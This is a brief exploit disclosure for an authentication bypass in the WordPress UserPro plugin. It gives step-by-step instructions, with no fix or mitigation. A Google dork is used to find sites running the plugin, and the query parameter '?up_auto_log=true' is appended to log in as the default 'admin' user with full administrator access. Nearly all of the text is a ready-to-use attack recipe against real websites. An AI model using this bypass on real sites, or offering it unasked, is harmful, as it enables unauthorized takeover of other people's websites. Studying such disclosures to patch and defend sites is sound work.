The userpro plugin has the ability to bypass login authentication for the user ‘admin’. If the site does not use the standard username ‘admin’ it is not affected.
1 - Google Dork inurl:/plugins/userpro
2 - Browse to a site that has the userpro plugin installed.
3 - Append ?up_auto_log=true to the target: http://www.targetsite.com/?up_auto_log=true
4 - If the site has a default 'admin' user you will now see the wp menu at the top of the site. You are now logged in will full administrator access.